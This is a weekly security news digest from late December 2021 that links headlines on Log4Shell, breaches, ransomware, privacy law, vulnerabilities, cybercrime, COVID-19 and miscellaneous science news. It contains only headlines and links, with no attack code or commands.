Welcome to This Week’s [in]Security. Big-Hacks: More log4shell. New breaches: Azure, Hellman. New Ransomware: terrorism? Inetum. Major outages: AWS. Follow-ups & Fall-out: HIPB adds near 1B passwords. Privacy: Eye-tracking. Laws & Regs - Canada: digital law, AI. US: tech lawsuits. World: Judgements & fines. Standards: NISTR draft. Defense: fighting scams, browser enhancements. Vulnerabilities, Other Vulnerabilities: Multiple-MS, WordPress plugin, VoIP backdoors, 7% pass, IoT honeypot, crypto-research. Cybercrime: Trends: top 5 scams, andrioid, powerpoint. Nation States: NSO group, Zoho. Crime & Enforcement: crypto returned, SEC filings. Other Risks: 5G & aircraft, Juice jacking, Human behavior. Innovations & Inventions: quantum, lickable screens. Health, Safety & Environment. Covid-19: Spread, Curves, Waves, and Variants; Response; Changing restrictions, Treatments; Rapid-Tests, Immunity; New Vaccine type. Learned; Omicon, Covid Ugly; Covid Compliance. And more.

Breaches / Ransomware / Leaks

Covering breaches, leaks, data exposures, ransomware (as potential breach), and their fallout.

• Major incidents:

  • CISA, FBI and NSA Publish Joint Advisory and Scanner for Log4j Vulnerabilities https://thehackernews.com/2021/12/cisa-fbi-and-nsa-publish-joint-advisory.html
  • CISA releases Apache Log4j scanner to find vulnerable apps https://www.bleepingcomputer.com/news/security/cisa-releases-apache-log4j-scanner-to-find-vulnerable-apps/
  • Google Finds 35,863 Java Packages Using Defective Log4j https://www.securityweek.com/google-finds-35863-java-packages-using-defective-log4j
  • Java Code Repository Riddled with Hidden Log4j Bugs; Here's Where to Look https://threatpost.com/java-supply-chain-log4j-bug/177211/
  • Examining Log4j Vulnerabilities in Connected Cars and Charging Stations https://www.trendmicro.com/en_us/research/21/l/examining-log4j-vulnerabilities-in-connected-cars.html
  • 6 Ways to Quickly Detect a Log4Shell Exploit in Your Environment https://blog.qualys.com/vulnerabilities-threat-research/2021/12/19/5-ways-to-quickly-detect-a-log4shell-exploit-in-your-environment
  • New Options Profiles for Log4Shell Detection https://blog.qualys.com/vulnerabilities-threat-research/2021/12/20/new-options-profiles-for-log4shell-detection
  • Conti Ransomware Gang Has Full Log4Shell Attack Chain https://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/
  • Log4j vulnerability now used to install Dridex banking malware https://www.bleepingcomputer.com/news/security/log4j-vulnerability-now-used-to-install-dridex-banking-malware/
  • Log4j Makes Waves In The US Financial Industry https://packetstormsecurity.com/news/view/32942/Log4j-Makes-Waves-In-The-US-Financial-Industry.html
  • Alibaba Cloud slapped by Chinese ministry for mishandling Log4j https://www.theregister.com/2021/12/23/alibaba_cloud_in_trouble_with/

• New Breaches:

  • Four years: that's how long Azure's App Service had a source code leak bug https://www.theregister.com/2021/12/24/azure_app_service_not_legit_source_code_leak/
  • Ransomware Operators Leak Data Stolen From Logistics Giant Hellmann https://www.securityweek.com/ransomware-operators-leak-data-stolen-logistics-giant-hellmann
  • Massive data breach exposes wage and personal info of more than 637,000 Albanian residents https://www.databreaches.net/massive-data-breach-exposes-wage-and-personal-info-of-more-than-637000-albanian-residents/
  • Computer containing vaccine data stolen in Brussels https://www.databreaches.net/computer-containing-vaccine-data-stolen-in-brussels/

• New Ransomware and "Incidents":

  • Ransomware May Be Terrorism, But Security Pros Differ Markedly in How to Deal With It https://www.digitaltransactions.net/ransomware-may-be-terrorism-but-security-pros-differ-markedly-in-how-to-deal-with-it/
  • New Ransomware Variants Flourish Amid Law Enforcement Actions https://thehackernews.com/2021/12/new-ransomware-variants-flourish-amid.html
  • Global IT services provider Inetum hit by ransomware attack https://www.bleepingcomputer.com/news/security/global-it-services-provider-inetum-hit-by-ransomware-attack/
  • Evil Corp Is Dodging Sanctions By Dressing Up As REvil https://packetstormsecurity.com/news/view/32933/Evil-Corp-Is-Dodging-Sanctions-By-Dressing-Up-As-REvil.html

• Major outages/downs:

  • AWS suffers third outage of the month https://arstechnica.com/information-technology/2021/12/aws-suffers-third-outage-of-the-month/

• Follow-ups and fall-out:

  • UK govt shares 585 million passwords with Have I Been Pwned https://www.bleepingcomputer.com/news/security/uk-govt-shares-585-million-passwords-with-have-i-been-pwned/
  • Open Source Pwned Passwords with FBI Feed and 225M New NCA Passwords is Now Live! https://www.troyhunt.com/open-source-pwned-passwords-with-fbi-feed-and-225m-new-nca-passwords-is-now-live/

Privacy

Articles about privacy related news, risks, and trends.

• Eye Tracking in Retail Shopping Must Benefit the Consumer https://www.pymnts.com/news/retail/2021/eye-tracking-in-retail-shopping-must-benefit-the-consumer/
• Privacy-focused search engine DuckDuckGo grew by 46% in 2021 https://www.bleepingcomputer.com/news/technology/privacy-focused-search-engine-duckduckgo-grew-by-46-percent-in-2021/

Laws, Regulations, Platforms, Standards, and Public Policy

News about laws, regulations, platform rules, and standards affecting security, privacy, technology, and public interest.

• Canada:

  • The Law Bytes Podcast, Episode 113: The Year in Canadian Digital Law and Policy https://www.michaelgeist.ca/2021/12/law-bytes-podcast-episode-113/
  • Submission to the Toronto Police Services Board's Use of New Artificial Intelligence Technologies Policy https://citizenlab.ca/2021/12/submission-to-the-toronto-police-services-boards-use-of-new-artificial-intelligence-technologies-policy/

• US:

  • Phishing victim can't claim $5 million loss for money it never ‘held' https://www.databreaches.net/phishing-victim-cant-claim-5-million-loss-for-money-it-never-held/
  • Meta sues people behind Facebook and Instagram phishing https://www.bleepingcomputer.com/news/security/meta-sues-people-behind-facebook-and-instagram-phishing/
  • TikTok sued by former content moderator for allegedly failing to protect her mental health https://www.theverge.com/2021/12/24/22852817/tiktok-content-moderation-lawsuit-candie-frazier

• World:

  • Pain and Suffering for a Data Breach? German Court Issues First Decision of Its Kind in Europe. https://www.databreaches.net/pain-and-suffering-for-a-data-breach-german-court-issues-first-decision-of-its-kind-in-europe/
  • If Your Disclosure of a Data Breach Was “Late,” You May Have to Litigate https://www.databreaches.net/if-your-disclosure-of-a-data-breach-was-late-you-may-have-to-litigate/
  • Google faces nearly $100 million fine in Russia over failure to delete banned content https://www.theverge.com/2021/12/24/22852827/google-100-million-fine-russia-banned-content-big-tech-regulation

• Standards News:

  • NICE Framework Competencies: 2nd Draft NISTIR 8355 Available for Comment through January 31 https://csrc.nist.gov/publications/detail/nistir/8355/draft

Defense / Techniques / Solutions

Covering developments and opportunities that may help improve security.

• T-Mobile says it blocked 21 billion scam calls this year https://www.bleepingcomputer.com/news/security/t-mobile-says-it-blocked-21-billion-scam-calls-this-year/
• Windows 10 21H2 adds ransomware protection to security baseline https://www.bleepingcomputer.com/news/microsoft/windows-10-21h2-adds-ransomware-protection-to-security-baseline/
• Meta cracks down on phishing scams that use its trademarks https://www.theverge.com/2021/12/20/22846952/meta-lawsuit-phishing-attacks
• DuckDuckGo is working on a privacy-focused desktop browser https://www.theverge.com/2021/12/21/22848133/duckduckgo-browser-pc-mac-beta-privacy-default-settings
• Opera browser working on clipboard anti-hijacking feature https://www.bleepingcomputer.com/news/security/opera-browser-working-on-clipboard-anti-hijacking-feature/

Bugs / Design Flaws / Vulnerabilities / Research

Articles about newly discovered vulnerabilities and research.

• Other Vulnerabilities:
• A Year in Microsoft Bugs: The Most Critical, Overlooked & Hard to Patch https://www.darkreading.com/threat-intelligence/a-year-in-microsoft-bugs-the-most-critical-overlooked-and-hard-to-patch
• Microsoft Office Patch Bypassed for Malware Distribution in Apparent 'Dry Run' https://www.securityweek.com/microsoft-office-patch-bypassed-malware-distribution-apparent-dry-run
• Microsoft Teams bug allowing phishing unpatched since March https://www.bleepingcomputer.com/news/security/microsoft-teams-bug-allowing-phishing-unpatched-since-march/
• Microsoft Urges Customers to Patch Recent Active Directory Vulnerabilities https://www.securityweek.com/microsoft-urges-customers-patch-recent-active-directory-vulnerabilities
• Microsoft warns of easy Windows domain takeover via Active Directory bugs https://www.bleepingcomputer.com/news/microsoft/microsoft-warns-of-easy-windows-domain-takeover-via-active-directory-bugs/
• MS Teams link preview: 1 feature, 4 vulnerabilities https://positive.security/blog/ms-teams-1-feature-4-vulns
• 800K WordPress sites still impacted by critical SEO plugin flaw https://www.bleepingcomputer.com/news/security/800k-wordpress-sites-still-impacted-by-critical-seo-plugin-flaw/
• Secret Backdoors Found in German-made Auerswald VoIP System https://thehackernews.com/2021/12/secret-backdoors-found-in-german-made.html
• Blackmagic fixes critical DaVinci Resolve code execution flaws https://www.bleepingcomputer.com/news/security/blackmagic-fixes-critical-davinci-resolve-code-execution-flaws/
• 93% of Tested Networks Vulnerable to Breach, Pen Testers Find https://www.darkreading.com/attacks-breaches/93-of-tested-networks-vulnerable-to-breach-pentesters-find
• Honeypot experiment reveals what hackers want from IoT devices https://www.bleepingcomputer.com/news/security/honeypot-experiment-reveals-what-hackers-want-from-iot-devices/
• Vulnerability Spotlight: Vulnerabilities in metal detector peripheral could allow attackers to manipulate security devices http://blog.talosintelligence.com/2021/12/vuln-spotlight-garrett-metal-detector.html
• This security researcher fooled an at-home COVID-19 test using a Bluetooth hack https://www.theverge.com/2021/12/21/22847222/ellume-at-home-covid-test-bluetooth-android-certification
• Disclosing Shamir's Secret Sharing vulnerabilities and announcing ZKDocs https://blog.trailofbits.com/2021/12/21/disclosing-shamirs-secret-sharing-vulnerabilities-and-announcing-zkdocs/
• Traceable PRFs: Full Collusion Resistance and Active Security, by Sarasij Maitra and David J. Wu https://eprint.iacr.org/2021/1675
• Multi-Issuer Anonymous Credentials Without a Root Authority, by Kaoutar Elkhiyaoui and Angelo De Caro and Elli Androulaki https://eprint.iacr.org/2021/1669

Hacking / Malware / Cybercrime / Exploitation

News covering active trends, alerts, events.

• Trends, Alerts, and Events (other than major breaches):

  • These are the top five scams Canadians fell for in 2021 https://toronto.ctvnews.ca/these-are-the-top-five-scams-canadians-fell-for-in-2021-1.5718580
  • Threat actors steal $80 million per month with fake giveaways, surveys https://www.bleepingcomputer.com/news/security/threat-actors-steal-80-million-per-month-with-fake-giveaways-surveys/
  • Over 500,000 Android Users Downloaded a New Joker Malware App from Play Store https://thehackernews.com/2021/12/over-500000-android-users-downloaded.html
  • PowerPoint attachments, Agent Tesla and code reuse in malware, (Mon, Dec 20th) https://isc.sans.edu/diary/rss/28154
  • Stealthy BLISTER malware slips in unnoticed on Windows systems https://www.bleepingcomputer.com/news/security/stealthy-blister-malware-slips-in-unnoticed-on-windows-systems/
  • Dridex malware trolls employees with fake job termination emails https://www.bleepingcomputer.com/news/security/dridex-malware-trolls-employees-with-fake-job-termination-emails/
  • FBI: Hackers Are Actively Exploiting This Flaw On ManageEngine Desktop Central Servers https://packetstormsecurity.com/news/view/32935/FBI-Hackers-Are-Actively-Exploiting-This-Flaw-On-ManageEngine-Desktop-Central-Servers.html
  • Tropic Trooper Cyber Espionage Hackers Targeting Transportation Sector https://thehackernews.com/2021/12/tropic-trooper-cyber-espionage-hackers.html
  • De: Counterfeiters want to hijack the pharmacists' DAV portal https://www.databreaches.net/de-counterfeiters-want-to-hijack-the-pharmacists-dav-portal/

• Nation State Actors:

  • AP Exclusive: Polish Opposition Duo Hacked With NSO Spyware https://www.securityweek.com/ap-exclusive-polish-opposition-duo-hacked-nso-spyware
  • More on NSO Group and Cytrox: Two Cyberweapons Arms Manufacturers https://www.schneier.com/blog/archives/2021/12/more-on-nso-group-and-cytrox-two-cyberweapons-arms-manufacturers.html
  • The secret Uganda deal that has brought NSO to the brink of collapse https://arstechnica.com/features/2021/12/the-secret-uganda-deal-that-has-brought-nso-to-the-brink-of-collapse/
  • FBI: State hackers exploiting new Zoho zero-day since October https://www.bleepingcomputer.com/news/security/fbi-state-hackers-exploiting-new-zoho-zero-day-since-october/

• Crime & Arrests, etc.:

  • Stolen Bitcoins Returned https://www.schneier.com/blog/archives/2021/12/stolen-bitcoins-returned.html
  • Scammers Stole $7.7 Billion In Crypto In 2021 https://packetstormsecurity.com/news/view/32931/Scammers-Stole-7.7-Billion-In-Crypto-In-2021.html
  • Russian hackers made millions by stealing SEC earning reports https://www.bleepingcomputer.com/news/security/russian-hackers-made-millions-by-stealing-sec-earning-reports/
  • Rideshare account hacker faces up to 22 years in prison https://www.bleepingcomputer.com/news/legal/rideshare-account-hacker-faces-up-to-22-years-in-prison/
  • Russian Hacker Extradited to US for Trading on Stolen Information https://www.securityweek.com/russian-hacker-extradited-us-trading-stolen-information

Other Security / Risk

Articles covering other types of risks.

• Airbus and Boeing express concerns over 5G interference in US https://www.theguardian.com/science/2021/dec/21/airbus-and-boeing-express-concerns-over-5g-interference-in-us
• Airbnb tightens ‘anti-party' rules for rentals as New Year's Eve approaches https://www.theverge.com/2021/12/20/22846414/airbnb-party-night-rentals-new-years-eve-restrictions
• DtSR Episode 480 - Juice Jacking http://podcast.wh1t3rabbit.net/dtsr-episode-480-juice-jacking
• Nearly 50% of People Will Abandon Sites Prohibiting Password Reuse https://www.darkreading.com/risk/nearly-50-of-people-will-abandon-sites-prohibiting-password-reuse
• Scientists Have Identified The Driving Force Behind Your Darkest Impulses https://www.sciencealert.com/scientists-have-identified-the-driving-force-behind-your-darkest-impulses
• How COVID Is Changing the Study of Human Behavior https://www.scientificamerican.com/article/how-covid-is-changing-the-study-of-human-behavior/
• Elon Musk: metaverse isn't ‘compelling' and Web3 ‘more marketing than reality' https://www.theverge.com/2021/12/22/22849717/elon-musk-metaverse-web3-more-marketing-than-reality
• Regina police use conducted energy weapon during break-and-enter arrest https://globalnews.ca/news/8471057/regina-police-cew-taser-arrest-break-and-enter/
• The Absurdity of Renting a Car Will No Longer Be Tolerated https://www.theatlantic.com/technology/archive/2021/12/car-rental-shortage-covid/621068/
• A new “epitope” for universal influenza vaccines https://scienmag.com/a-new-epitope-for-universal-influenza-vaccines/
• Could Omicron have been predicted? First-of-its-kind technology possibly foresees variants https://globalnews.ca/news/8463507/technology-predict-covid-19-virus-mutants-omicron/

• Innovations & Inventions:

  • A-list candidate for fault-free quantum computing delivers surprise https://phys.org/news/2021-12-a-list-candidate-fault-free-quantum.html
  • Take a look at this delicious lickable screen to see the future we knew was coming https://www.theverge.com/2021/12/23/22851585/lick-taste-the-tv-screen-snozzberries-flavor-chemicals-menu
  • Tsunamis' magnetic fields are detectable before sea level change https://scienmag.com/tsunamis-magnetic-fields-are-detectable-before-sea-level-change/

• Health, Safety & Environment:

  • Tesla Agrees to Stop Letting Drivers Play Video Games in Moving Cars https://www.nytimes.com/2021/12/23/business/tesla-video-games.html
  • Ontario woman left shocked after washing machine door explodes https://toronto.ctvnews.ca/ontario-woman-left-shocked-after-washing-machine-door-explodes-1.5714652
  • Love it or hate it, wind chill is real. We break down 5 myths https://www.cbc.ca/news/canada/edmonton/love-it-or-hate-it-wind-chill-is-real-we-break-down-5-myths-1.6285040
  • How a great white shark altered an N.S. underwater researcher's diving plans for 2022 https://halifax.citynews.ca/local-news/how-a-great-white-shark-altered-an-ns-underwater-researchers-diving-plans-for-2022-4899459
  • The Next Disaster Coming to the Great Plains https://www.theatlantic.com/ideas/archive/2021/12/kansas-aquifer-ogallala-water-crisis-drought/621007/

COVID-19 updates.

COVID related articles. We have been following coronavirus risks since https://controlgap.com/blog/this-weeks-insecurity-issue-147.

• The spread, curves, spikes, waves, reinfection, and variant strains:

  • France reports more than 100,000 COVID-19 cases on Christmas Day https://globalnews.ca/news/8474497/france-covid-cases-record-dec-25/
  • Omicron now dominant COVID-19 variant in U.S., makes up 73% of cases https://globalnews.ca/news/8464684/covid-19-omicron-variant-us-dominant/
  • Ontario reports record 10,412 new COVID-19 cases https://toronto.ctvnews.ca/ontario-reports-record-10-412-new-covid-19-cases-1.5719831
  • True number of Ontario COVID cases likely much higher than what's being reported, experts say https://globalnews.ca/news/8471195/true-number-of-ontario-covid-cases-likely-much-higher-experts-say/
  • Quebec breaks record for highest daily provincial COVID-19 case count in Canada https://globalnews.ca/news/8465454/quebec-covid-19-dec-21-2021/
  • N.S. sets another daily COVID-19 case record with almost 700 https://globalnews.ca/news/8471395/covid-19-halifax-ns-dec-23/
  • South Africa's drop in daily new COVID-19 cases suggest its Omicron peak may have passed, experts say https://www.businessinsider.com/south-africa-coronavirus-cases-drop-suggest-omicron-peak-passed-experts-2021-12

• Guidance, Response, and Recovery:

  • The COVID Externalities Have Changed https://www.theatlantic.com/ideas/archive/2021/12/covid-restrictions-2021-omicron-externalities/621076/
  • PCR tests now required upon return to Canada for any length of travel amid Omicron https://globalnews.ca/news/8465299/travel-pcr-test-canada-omicron-in-effect/
  • P.E.I. joins Newfoundland and Labrador in setting isolation period for visitors https://globalnews.ca/news/8465947/pei-nl-covid-19-isolation-visitors/
  • Home for the holidays: How to navigate vaccinated and unvaccinated gatherings this year https://toronto.ctvnews.ca/home-for-the-holidays-how-to-navigate-vaccinated-and-unvaccinated-gatherings-this-year-1.5715131
  • A Royal Caribbean cruise ship was denied entry into Curacao and Aruba after at least 55 people tested positive for COVID-19 https://www.businessinsider.com/royal-caribbean-cruise-denied-entry-curacao-aruba-covid-19-cases-2021-12
  • Requirement for adults to wear masks in schools has major impact on Covid-19 transmissions, study finds https://scienmag.com/requirement-for-adults-to-wear-masks-in-schools-has-major-impact-on-covid-19-transmissions-study-finds/

• Treatments, Testing, Triage, Trials, and things we Learned:

  • mRNA vaccines highly effective at preventing death from COVID-19, less effective at preventing infection https://scienmag.com/mrna-vaccines-highly-effective-at-preventing-death-from-covid-19-less-effective-at-preventing-infection/
  • FDA authorizes second COVID-19 antiviral pill https://www.theverge.com/2021/12/23/22851632/fda-covid-antiviral-authorization-merck-pfizer
  • Ontario becomes the first province to list fluvoxamine as a COVID-19 treatment to consider https://www.ctvnews.ca/health/coronavirus/ontario-becomes-the-first-province-to-list-fluvoxamine-as-a-covid-19-treatment-to-consider-1.5717489
  • Rapid COVID-19 tests: When to take one, and what to do if it's positive https://globalnews.ca/news/8463521/rapid-covid-19-test-omicron-guide/
  • The Atlantic Daily: What Rapid Tests Miss https://www.theatlantic.com/newsletters/archive/2021/12/how-to-use-rapid-tests/621086/

• Immunity and Vaccinations:

  • Western University researchers developing rVSV COVID-19 vaccine https://globalnews.ca/news/8465373/western-university-covid-19-vaccine-development/
  • Things we learned:
  • Omicron carries less risk of hospitalization vs. Delta, study suggests https://globalnews.ca/news/8468230/omicron-hospitalization-risk-study/
  • UBC scientists reveal world's first molecular-level analysis of Omicron variant's spike protein https://globalnews.ca/news/8469325/ubc-scientists-omicron-molecular-analysis/
  • First “variant of concern” evolved to evade immune system https://scienmag.com/first-variant-of-concern-evolved-to-evade-immune-system/

• More of the good, the bad, and the ugly:

  • Ontario says it will 'track down' and fine those reselling COVID-19 rapid antigen test kits for unfair prices https://toronto.ctvnews.ca/ontario-says-it-will-track-down-and-fine-those-reselling-covid-19-rapid-antigen-test-kits-for-unfair-prices-1.5715743

• Masks, anti-maskers, distancing, compliance, and repercussions:

  • Your cloth mask is not good enough protection against Omicron, according to an expert https://www.businessinsider.com/cloth-masks-are-not-good-enough-protection-against-omicron-expert-2021-12

Off-Topic / Science & Tech / Lighter Side

A variety of scientific, technical, historical, and more light-hearted news.

• Pair of massive machines just arrived in Toronto to carve out another transit line https://www.blogto.com/city/2021/12/pair-massive-machines-arrived-toronto-transit-line/
• You Have No Idea How Hard It Is to Get a Hamster Drunk https://www.theatlantic.com/science/archive/2021/12/alcohol-consumption-hamster-drunk/621125/
• Asteroid Ryugu contains darkest material in the known solar system https://www.independent.co.uk/space/asteroid-ryugu-dark-material-solar-system-b1979966.html
• Astronomers discover largest group of ‘rogue planets' yet https://www.theverge.com/2021/12/23/22851798/planets-space-rogue-stars-telescope
• The James Webb Space Telescope launched successfully https://www.universetoday.com/153813/jwst-is-on-its-way/